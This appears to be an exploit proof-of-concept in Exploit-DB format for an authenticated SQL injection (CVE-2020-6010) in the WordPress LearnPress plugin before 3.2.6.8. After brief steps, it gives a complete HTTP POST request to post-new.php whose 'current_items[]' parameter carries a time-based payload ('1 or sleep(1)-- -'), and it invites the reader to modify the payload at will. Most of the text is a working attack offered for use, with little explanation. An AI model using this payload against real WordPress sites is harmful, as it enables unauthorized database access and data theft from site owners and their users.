32 lines
No EOL
1.7 KiB
Text
32 lines
No EOL
1.7 KiB
Text
# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
|
|
# Date: 07-17-2021
|
|
# Exploit Author: nhattruong or nhattruong.blog
|
|
# Vendor Homepage: https://thimpress.com/learnpress/
|
|
# Software Link: https://wordpress.org/plugins/learnpress/
|
|
# Version: < 3.2.6.8
|
|
# References link: https://wpscan.com/vulnerability/10208
|
|
# CVE: CVE-2020-6010
|
|
|
|
POC:
|
|
1. Go to url http://<host>/wp-admin
|
|
2. Login with a cred
|
|
3. Execute the payload
|
|
|
|
|
|
POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
|
Accept: application/json, text/plain, */*
|
|
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
|
|
Accept-Encoding: gzip, deflate
|
|
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
|
|
Content-Type: application/x-www-form-urlencoded
|
|
X-Requested-With: XMLHttpRequest
|
|
Content-Length: 128
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145
|
|
|
|
type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items¤t_items[]=1 or sleep(1)-- -
|
|
|
|
# Modify current_items[] as you want |